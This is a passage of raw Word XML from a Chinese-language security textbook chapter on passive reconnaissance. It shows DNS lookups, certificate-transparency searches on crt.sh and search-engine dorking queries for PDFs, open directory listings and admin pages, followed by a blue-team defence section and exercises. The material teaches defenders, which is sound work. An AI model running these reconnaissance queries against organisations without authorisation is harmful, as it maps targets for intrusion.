        <w:t xml:space="preserve">记录中的授权发件服务器列表、DNS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">服务器名称。②</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> TTL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">值因目标</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DNS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">配置而异。③</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">@8.8.8.8</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">指定使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Google </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">公共</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DNS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">进行解析，确保查询不经过本地的默认</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DNS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">服务器——这是标准的被动查询方式，与普通用户行为无异。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">第三步：证书透明日志查询</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">通过浏览器访问</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">https://crt.sh/?q=%25.&lt;DOMAIN&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，其中</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">%25</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">是百分号</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">%</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> URL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">编码，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">%</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> crt.sh </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">中表示通配符。预期要点：返回列表中显示历史上为该域名及子域颁发的证书，包括子域名称、签发</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">CA、证书有效期。②</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">显示的子域数量和名称取决于目标组织的证书管理方式。请注意：阅读</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">日志本身是合法的公开数据查询行为，但后续基于此信息的深入扫描需要授权。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">第四步：搜索引擎</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Dorking </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">示例</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">site:&lt;DOMAIN&gt; filetype:pdf</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">site:&lt;DOMAIN&gt; intitle:"index of"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">site:&lt;DOMAIN&gt; inurl:admin</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">预期要点：展示如何通过搜索引擎语法缩小检索范围。②</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">实际结果取决于搜索引擎索引的内容和目标的暴露情况。在实验教学中，可使用公开的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> OWASP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">目标或已知的授权靶机域名进行演示。③</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">这些语法是搜索引擎的标准查询接口，不属于漏洞利用。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">常见报错与排错</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">whois</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">命令返回连接超时：某些</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> TLD </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> WHOIS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">服务器可能被实验网络防火墙阻挡。可尝试使用在线</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> WHOIS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">服务作为替代方案。②</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">dig</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">返回</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">status: REFUSED</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：目标</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DNS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">服务器拒绝回答该查询，可能是由于仅允许递归查询来自特定</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP。② </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">这是正常的安全配置，不应视为可利用的漏洞。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">dig</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">查询超时：实验网络可能未正确配置</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DNS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">出站规则。检查防火墙是否放行</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> UDP 53 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">端口出站。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- crt.sh </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">返回空结果：目标域名可能未使用公开受信的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CA </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">签发的证书，或使用了通配符证书未在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">日志中留下子域记录。②</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">搜索引擎</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Dorking </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">返回错误或验证码：搜索引擎可能将高频率的自动化查询视为滥用行为，触发反爬机制。这是预期行为，提示攻击者也需要控制查询频率以避免被封禁。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="82"/>
    <w:bookmarkStart w:id="83" w:name="防御对照框"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">防御对照框</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">针对本节描述的各类被动侦察手段，蓝队应采取以下分层次的防御措施：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">减少信息暴露面（源头治理）</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">为所有域名启用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> WHOIS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">隐私保护，使用注册商代理信息替代真实联系人。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">定期使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">whois</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">和被动</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DNS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">服务审查本组织域名的暴露情况，清理残留的历史数据。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">审查</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SPF/DMARC </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">记录，确保不包含不必要的内部</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">地址或服务器信息。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">推行通配符</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> TLS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">证书策略，减少在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">日志中暴露的子域数量。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">对公开代码仓库实施强制性</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Secrets </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Scanning，阻止凭据和配置信息推送到公开仓库。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">审查组织网站上的公开文件，删除可能包含内部细节的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">PDF、Excel、文档模板。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">robots.txt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">和</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">X-Robots-Tag</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">HTTP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">头阻止搜索引擎索引敏感路径（同时理解这一措施的局限性）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">监控针对本组织的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> OSINT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">活动（持续检测）</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">将本组织的域名、IP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">段、关键子域列为监控资产，定期通过被动</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DNS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">服务和</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">日志检查是否有新的或异常的记录。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">启用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Google Alerts </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或商业威胁情报平台监控包含组织名称、域名的公开提及，及时发现敏感讨论或泄露。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">监控</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">日志中是否有针对本组织域名的未授权证书签发——这可能是</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CA </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">被入侵或证书欺诈的信号。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">对公开搜索到的本组织信息进行分类和风险评估，识别哪些信息可能被攻击者用于社会工程学或后续攻击跳板。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">蓝队应定期执行模拟攻击者的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> OSINT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">演练（OSINT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Red </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Teaming），从外部视角评估组织的数字足迹暴露程度，并将发现结果纳入暴露面管理（ASM）流程。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">人员安全意识</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">培训员工理解</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> OSINT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的威力：一个看似无害的技术博客截图、一个</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Stack Overflow </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">上的配置粘贴、一个招聘广告中的技术栈细节，都可能被攻击者关联利用。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">明确社交媒体的信息发布边界：员工个人社交资料中的职位和组织信息同样是</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> OSINT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">数据源。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="83"/>
    <w:bookmarkStart w:id="84" w:name="习题-3"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">习题</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">提取题</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">被动侦察与主动侦察的核心区别是什么？在杀伤链的进攻场景中，为什么攻击者通常会优先执行被动侦察？</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">列举至少四种</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> OSINT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">被动信息源，并分别说明攻击者能从每种信息源中获得哪类关键资产信息。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">证书透明日志（CT）的设计初衷是为了增强</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> TLS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">生态的安全性，但它同时也成为一种被动侦察手段。请解释这一攻防悖论：CT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">日志如何同时服务于防御检测和攻击侦察？</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">4. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">防御者如何利用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> OSINT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">技术来减少本组织的攻击面？请从源头治理和持续监控两个维度给出具体措施。</w:t>
